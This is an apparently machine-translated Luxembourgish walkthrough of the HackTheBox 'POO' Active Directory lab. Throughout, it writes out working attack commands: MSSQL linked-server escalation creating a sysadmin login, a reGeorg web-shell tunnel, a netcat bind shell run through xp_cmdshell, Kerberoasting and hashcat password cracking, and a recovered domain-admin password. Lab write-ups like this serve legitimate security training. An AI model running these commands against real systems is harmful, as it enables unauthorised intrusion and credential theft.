HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

An dësem Artikel wäerte mir de Passage vun net nëmmen eng Maschinn analyséieren, mä e ganze Mini-Laboratoire vum Site HackTheBox.

Wéi an der Beschreiwung uginn, ass POO entwéckelt fir Fäegkeeten op all Stadium vun Attacken an engem klengen Active Directory Ëmfeld ze testen. D'Zil ass e verfügbaren Host ze kompromittéieren, Privilegien ze eskaléieren, a schliisslech de ganze Domain kompromittéieren andeems Dir 5 Fändelen am Prozess sammelt.

D'Verbindung zum Laboratoire ass iwwer VPN. Et ass recommandéiert net vun engem schaffende Computer oder vun engem Host ze verbannen, wou et wichteg Donnéeën fir Iech ass, well Dir an e privaten Netzwierk mat Leit erakënnt, déi eppes iwwer Informatiounssécherheet wëssen 🙂

organisatoresch Informatiounen
Fir datt Dir iwwer nei Artikelen, Software an aner Informatioune gewuer kënnt, hunn ech erstallt Telegramm Kanal и Grupp fir all Themen ze diskutéieren am Beräich vun IIKB. Och Är perséinlech Ufroen, Froen, Virschléi a Empfehlungen Ech kucken a jidderengem äntweren..

All Informatioun gëtt nëmme fir pädagogesch Zwecker geliwwert. Den Auteur vun dësem Dokument iwwerhëlt keng Verantwortung fir all Schued, dee jidderengem verursaacht gëtt als Resultat vum Gebrauch vum Wëssen a Methoden, déi als Resultat vun der Studie vun dësem Dokument kritt goufen.

Intro

Dëst Endspill besteet aus zwou Maschinnen an enthält 5 Fändelen.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

D'Beschreiwung an d'Adress vum verfügbaren Host gëtt och uginn.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Loosst eis ufänken!

Recon Fändel

Dës Maschinn huet eng IP Adress vun 10.13.38.11 déi ech op /etc/hosts addéieren.
10.13.38.11 poo.htb

Den éischte Schrëtt ass fir oppe Ports ze scannen. Well et laang dauert fir all Ports mat nmap ze scannen, wäert ech et fir d'éischt mat masscan maachen. Mir scannen all TCP an UDP Ports vun der tun0 Interface op 500pps.

sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Elo, fir méi detailléiert Informatiounen iwwer d'Servicer ze kréien déi op den Ports lafen, loosst eis e Scan mat der -A Optioun lafen.

nmap -A poo.htb -p80,1433

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Also hu mir IIS an MSSQL Servicer. An dësem Fall fanne mir de richtegen DNS Numm vum Domain a vum Computer eraus. Um Webserver gi mir vun der IIS Homepage begréisst.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Loosst eis iwwer d'Verzeichnungen iteréieren. Ech benotzen Gobuster fir dëst. An de Parameteren spezifizéiere mir d'Zuel vun de Streamen 128 (-t), URL (-u), Wierderbuch (-w) an Extensiounen déi eis interesséieren (-x).

gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Also hu mir HTTP Authentifikatioun fir den /admin Verzeichnis, souwéi d'.DS_Store Desktop Service Späicherdatei verfügbar. .DS_Store sinn Fichieren datt Benotzer Astellunge fir engem Dossier Buttek, wéi eng Lëscht vun Fichieren, icon Standuert, ausgewielt Hannergrond Bild. Esou e Fichier kann am Webserververzeechnes vu Webentwéckler ophalen. Sou kréie mir Informatiounen iwwer den Inhalt vum Verzeechnes. Fir dëst kënnt Dir benotzen DS_Store Crawler.

python3 dsstore_crawler.py -i http://poo.htb/

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mir kréien den Inhalt vum Verzeichnis. Déi interessantst Saach hei ass den /dev Verzeichnis, aus deem mir d'Quellen an db Dateien an zwou Filialen gesinn. Awer mir kënnen déi éischt 6 Zeeche vu Datei- a Verzeechnesnimm benotzen wann de Service vulnerabel ass fir IIS ShortName. Dir kënnt fir dës Schwachstelle kontrolléieren mat IIS Shortname Scanner.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

A mir fannen eng Textdatei déi mat "poo_co" ufänkt. Net wousst wat ech duerno maache soll, hunn ech einfach aus dem Dictionnaire vun den Verzeichnungen all d'Wierder ausgewielt, déi mat "co" ufänken.

cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt

An iteréiert iwwer wfuzz.

wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

A fënnt dat richtegt Wuert! Mir kucken dës Datei, späichert d'Umeldungsinformatiounen (vum DBNAME Parameter beurteelen, si sinn aus MSSQL).

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mir ginn de Fändel iwwer, a mir kommen ëm 20% vir.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Huh flag

Mir verbannen mat MSSQL, ech benotzen DBeaver.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mir fanne näischt interessant an dëser Datebank, loosst eis en SQL Editor erstellen a kucken wat d'Benotzer sinn.

SELECT name FROM master..syslogins;

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mir hunn zwee Benotzer. Loosst eis eis Privilegien iwwerpréiwen.

SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Sou ginn et keng Privilegien. Loosst eis d'verlinkte Server kucken, ech hunn iwwer dës Technik am Detail geschriwwen hei.

SELECT * FROM master..sysservers;

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Also fanne mir en anere SQL Server. Loosst eis d'Ausféierung vun Kommandoen op dësem Server iwwerpréiwen mat openquery ().

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

A mir kënne souguer e Query Bam bauen.

SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');

D'Tatsaach ass datt wa mir eng Ufro un e verlinkte Server maachen, gëtt d'Ufro am Kontext vun engem anere Benotzer ausgefouert! Loosst eis kucken wéi ee Benotzerkontext mir um verlinkte Server lafen.

SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

An elo kucke mer a wéi engem Kontext d'Ufro vum verlinkte Server un eis ausgefouert gëtt!

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Also ass et en DBO Kontext deen all Privilegien muss hunn. Loosst eis d'Privilegien iwwerpréiwen am Fall vun enger Ufro vun engem verlinkte Server.

SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Wéi Dir gesitt, hu mir all Privilegien! Loosst eis eisen Admin esou erstellen. Awer si loossen se net duerch openquery, loosst eis et maachen duerch EXECUTE AT.

EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";

An elo verbannen mir mat den Umeldungsinformatiounen vum neie Benotzer, beobachten déi nei Fändel Datebank.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mir iwwerginn dëse Fändel a gi weider.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Backtrack Fändel

Loosst eis d'Shell mat MSSQL kréien, ech benotzen mssqlclient vum Impacket Package.

mssqlclient.py ralf:[email protected] -db POO_PUBLIC

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mir mussen Passwierder kréien, an dat éischt wat mir scho begéint hunn ass de Site. Also brauche mir eng Webserverkonfiguratioun (mir kënnen net eng praktesch Shell werfen, anscheinend funktionnéiert d'Firewall).

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Awer den Zougang gëtt refuséiert. Och wa mir d'Datei aus MSSQL liesen kënnen, brauche mir just ze wëssen wéi eng Programméierungssprooche konfiguréiert sinn. An am MSSQL Verzeichnis fanne mir eraus datt et Python gëtt.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Da gëtt et kee Problem fir d'web.config Datei ze liesen.

EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mat den Umeldungsinformatiounen fonnt, gitt op / admin a wielt de Fändel.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Fouss Fändel

Tatsächlech sinn et e puer Onbequemlechkeete fir eng Firewall ze benotzen, awer duerch d'Netzwierk Astellunge kucken mir datt de IPv6 Protokoll och benotzt gëtt!

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Füügt dës Adress un /etc/hosts.
dead:babe::1001 poo6.htb
Loosst eis den Host nach eng Kéier scannen, awer dës Kéier iwwer IPv6.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

An de WinRM Service ass iwwer IPv6 verfügbar. Loosst eis mat de fonnten Umeldungsinformatiounen verbannen.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Et gëtt e Fändel um Desktop, iwwerginn.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

P00ned Fändel

No Reconnaissance op de Host mat winpeas mir fanne näischt Besonnesches. Dunn gouf decidéiert nach eng Kéier no Umeldungsinformatiounen ze sichen (ech hunn och iwwer dëst Thema geschriwwen Artikel). Mee ech konnt net all SPNs aus dem System via WinRM kréien.

setspn.exe -T intranet.poo -Q */*

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Loosst eis de Kommando iwwer MSSQL ausféieren.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Op dës Manéier kréie mir de SPN vun de Benotzer p00_hr an p00_adm, dat heescht datt se vulnérabel sinn fir en Attack wéi Kerberoasting. Kuerz gesot, mir kënnen d'Hashes vun hire Passwierder kréien.

Als éischt musst Dir eng stabil Shell am Numm vum MSSQL Benotzer kréien. Awer well mir am Zougang limitéiert sinn, hu mir eng Verbindung mam Host nëmmen duerch Ports 80 an 1433. Awer et ass méiglech den Traffic duerch den Hafen 80 ze tunnelen! Fir dëst benotze mir nächst Applikatioun. Loosst eis d'Tunnel.aspx Datei an den Heemverzeechnes vum Webserver eropluede - C: inetpubwwwroot.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Awer wa mir probéieren et ze kréien, kréie mir e Feeler 404. Dëst bedeit datt *.aspx Dateien net ausgefouert ginn. Fir Dateien mat dësen Extensiounen ze lafen, installéiert ASP.NET 4.5 wéi follegt.

dism /online /enable-feature /all /featurename:IIS-ASPNET45

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

An elo, beim Accès op tunnel.aspx, kréie mir d'Äntwert datt alles prett ass fir ze goen.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Loosst eis de Client Deel vun der Applikatioun starten, déi de Traffic relaiséiert. Mir wäerten all Traffic vum Hafen 5432 op de Server weiderginn.

python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

A mir benotze Proxychains fir de Traffic vun all Applikatioun duerch eise Proxy ze schécken. Loosst eis dëse Proxy an d'Konfiguratiounsdatei /etc/proxychains.conf addéieren.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Loosst eis elo de Programm op de Server eropluede netcat, mat deem mir eng stabil Bind Shell maachen, an de Skript Opruff Kerberoast, mat deem mir d'Kerberoasting Attack maachen.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Elo, duerch MSSQL, starten mir den Nolauschterer.

xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

A mir verbannen duerch eise Proxy.

proxychains rlwrap nc poo.htb 4321

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

A loosst eis d'Hashes kréien.

. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Als nächst musst Dir iwwer dës Hashes iteréieren. Zënter Rockyou hat kee Passwuertdaten Wierderbuch, Ech hunn ALL Passwuert Dictionnairen benotzt, déi a Seclists geliwwert ginn. Fir Opzielung benotze mir hashcat.

hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force

A mir fanne béid Passwierder, dat éischt am dutch_passwordlist.txt Wierderbuch, an dat zweet am Keyboard-Combinations.txt.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

An dofir hu mir dräi Benotzer, mir ginn op den Domain Controller. Loosst d'éischt seng Adress erausfannen.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Super, mir hunn d'IP Adress vum Domain Controller geléiert. Loosst eis all Benotzer vun der Domain erausfannen, wéi och wéi eng vun hinnen en Administrateur ass. Fir de Skript erofzelueden fir Informatiounen ze kréien PowerView.ps1. Da wäerte mir mat Evil-winrm verbannen, de Verzeechnes mat dem Skript am -s Parameter spezifizéieren. An dann lued just de PowerView Skript.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Elo hu mir Zougang zu all seng Funktiounen. De p00_adm Benotzer gesäit aus wéi e privilegiéierte Benotzer, also wäerte mir a sengem Kontext schaffen. Loosst eis e PSCredential Objet fir dëse Benotzer erstellen.

$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass

Elo all Powershell Kommandoen wou mir spezifizéieren Creds ginn am Numm vum p00_adm ausgefouert. Loosst eis eng Lëscht vun de Benotzer an den AdminCount Attribut weisen.

Get-NetUser -DomainController dc -Credential $Creds | select name,admincount

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

An dofir ass eise Benotzer wierklech privilegéiert. Mol kucken zu wéi enge Gruppen hie gehéiert.

Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mir bestätegen endlech datt de Benotzer en Domain Administrateur ass. Dëst gëtt et d'Recht fir op den Domain Controller op afstand aloggen. Loosst eis probéieren mat WinRM anzeloggen mat eisem Tunnel. Ech war duercherneen duerch d'Feeler vun reGeorg erausginn wann evil-winrm benotzt.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Da benotze mir eng aner, méi einfach, Schrëft fir mat WinRM ze verbannen. Öffnen an änneren Verbindungsparameter.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mir probéieren ze konnektéieren, a mir sinn am System.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Mee et gëtt kee Fändel. Da kuckt de Benotzer a kontrolléiert d'Desktops.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Bei mr3ks fanne mer de Fändel an de Labo ass 100% fäerdeg.

HackTheBoxendgame. Passage vum Laboratoire berufflech Offensiv Operatiounen. Pentest Active Directory

Dat ass alles. Als Feedback, kommentéiert ob Dir eppes Neies aus dësem Artikel geléiert hutt an ob et fir Iech nëtzlech war.

Dir kënnt mat eis bei Hëllefe profitéieren. Do fannt Dir interessant Materialien, fusionéiert Coursen, souwéi Software. Loosst eis eng Gemeinschaft sammelen an där et Leit wäerte ginn déi vill Beräicher vun IT verstinn, da kënne mir eis ëmmer bei all IT an Informatiounssécherheetsprobleemer hëllefen.

Source: will.com

Setzt e Commentaire